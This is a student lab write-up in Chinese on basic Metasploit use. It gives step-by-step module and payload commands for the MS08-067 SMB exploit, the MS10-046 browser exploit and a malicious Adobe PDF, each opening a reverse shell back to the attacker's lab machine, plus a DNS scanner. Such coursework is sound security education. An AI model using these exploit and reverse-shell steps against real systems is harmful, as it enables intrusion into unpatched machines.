Exp5 MSF基础应用

一个主动攻击实践,MS08-067

  • 首先利用msfconsole启用msf终端

  • 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块

如图:

  • 根据上图,我们输入use exploit/windows/smb/ms08_067_netapi,选择相应的模块

  • 然后我们可以使用show payloads,查看可以使用的模块

如图:

  • 然后根据上图,为获取靶机的shell,所以利用set payload generic/shell_reverse_tcp

  • 然后输入show options,查看配置信息,知道我们需要配置RHOST,LHOST,LPORT,target
    如图:

  • 输入
set RHOST 192.168.241.138
set LHOST 192.168.241.134
set LPORT 5210

进行配置

  • 然后我们再次利用show options,查看配置信息
    如图:

  • 然后exploit进行监听

如图:

  • 如果出现如下情况,关闭防火墙,就可以解决

针对浏览器的攻击,ms10_046

  • 起初我打算做ms11_050,攻击IE浏览器,但是IE8.0版本,不能成功,可能是IE8.0已经修复相关漏洞了。

  • 所以我选择了ms10_046,首先输入search ms10_046查找漏洞

如图:

  • 由于我们要对浏览器进行攻击,所以我们输入use use exploit/windows/browser/ms10_046_shortcut_icon_

  • 然后我们输入show payloads,查看载荷进行选择,这里我仍用实验一中的载荷set payload generic/shell_reverse_tcp

如图:

  • 我们利用show options查询需要配置的有,LPORT,LHOST,SRVHOST

  • 输入
set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5210

进行配置

  • 再次查看配置信息

如图:

  • 然后输入exploit生成URL

如图:

  • 在windows端访问该URL,kali端如图:

  • 输入sessions,可看到一个ID为1的连接
    如图:

  • 然后输入session -i 1,接入ID为1的连接,输入shell,获取成功。
    如图:

针对客户端的攻击

  • 首先还是先利用search adobe进行搜索
    如图:

  • 然后进行选择,我选择的是use windows/fileformat/adobe_flashplayer_button

  • 然后set payload windows/meterpreter/reverse_tcp,设置所用荷载,利用show options查看所要配置的信息
    如图:

  • 输入如下代码,对LHOST,LPORT,FILENAME进行配置
set LHOST 192.168.241.134
set LPORT 5210
set FILENAME 20155210.pdf
  • 输入exploit,生成20155210.pdf文件
    如图:

  • 输入use exploit/multi/handler,进入监听,并设置监听端口,主机号

  • 在windows端,打开20155210.pdf,成功回连
    如图:

辅助模块应用

  • 首先利用show auxiliary,查看辅助模块

  • 我选择的是scanner/dns/dns_amp,扫描dns

  • 输入show options,查看配置

  • 输入exploit进行监听

基础问题

  • 用自己的话解释什么是exploit,payload,encode

  • exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击

  • payload:相当于shellcode前身,也就是后门的模板

  • encode:对payload进行编码

实验体会

我们应该尽可能的,去更新最新版的软件和系统,否则就会给黑客可乘之机。

比如,我们做的实验都是基于xp系统的,但是如果对win7、8、10,进行攻击则无效。

比如,我在做实验2时,想做老师给的例子,但是那个漏洞对IE8.0不好使。

我们没有一个可以针对现用系统或者软件的渗透攻击库,离实战还是很远的

转载于:https://www.cnblogs.com/panyinghao/p/8921439.html

20155210 Exp5 MSF基础应用相关推荐

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155216 Exp5 MSF基础应用

    Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用. 一 ...

  4. 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...

  5. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  6. 《网络对抗》Exp5 MSF基础应用

    20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...

  7. 20155220 Exp5 MSF基础应用

    Exp5 MSF基础应用 一个主动攻击实践,MS08-067 首先利用msfconsole启用msf终端 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块 根据上图,我们输入use ...

  8. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  9. Exp5 MSF基础应用 20164323段钊阳

    网络对抗技术 20164323 Exp5 MSF基础应用 靶机 ip:192.168.1.229 kali ip:192.168.1.216 exploit选取 主动攻击:ms17_010_psexe ...

最新文章

  1. Android NDK 使用自己的共享库(Import Module)
  2. Redis的特性以及优势(附官网)
  3. Taro+react开发(67):数组中push返回的是长度
  4. jQuery之ajax错误调试分析
  5. 个人风格就是一种品牌
  6. 【中山市选2009】【BZOJ2463】谁能赢呢?
  7. cmd bat 相对命令
  8. 深入浅出分布式系统Raft协议
  9. DIV+CSS布局 - 弹性盒子布局
  10. 利用ENVI自带全球DEM数据计算区域平均高程
  11. java 实现微信搜索附近人功能
  12. 腾讯云服务器申请自助退款流程(图文教程)
  13. asp cstr 函数
  14. redis连接异常 redis.clients.jedis.exceptions.JedisClusterException: CLUSTERDOWN The cluster is down
  15. matlab2012簡明教程課後習題答案,MATLAB习题答案
  16. 怎么把视频转换成音频
  17. 密码库LibTomCrypt学习记录——(2.18)分组密码算法的工作模式——XTS代码
  18. HTML5中Audio对象volume属性的应用
  19. 【Android】玩转命令行工具-apkanalyzer
  20. uni-app腾讯地图位置选点

热门文章

  1. 爱奇艺体验Serverless极致扩缩容,资源利用率提升40%
  2. 从零点五开始用Unity做半个2D战棋小游戏(十一)
  3. SLF4J: Failed to load class “org.slf4j.impl.StaticLoggerBinder“
  4. netca 遇到TNS-04612: XXX 的 RHS 为空
  5. eclipse代码补全
  6. R语言中的特殊值 NA NULL NaN Inf
  7. BZOJ3083: 遥远的国度(树链剖分)
  8. ef AddDays报错
  9. django(7)modelform操作及验证、ajax操作普通表单数据提交、文件上传、富文本框基本使用...
  10. cocoapods Analyzing dependencies 问题的解决方案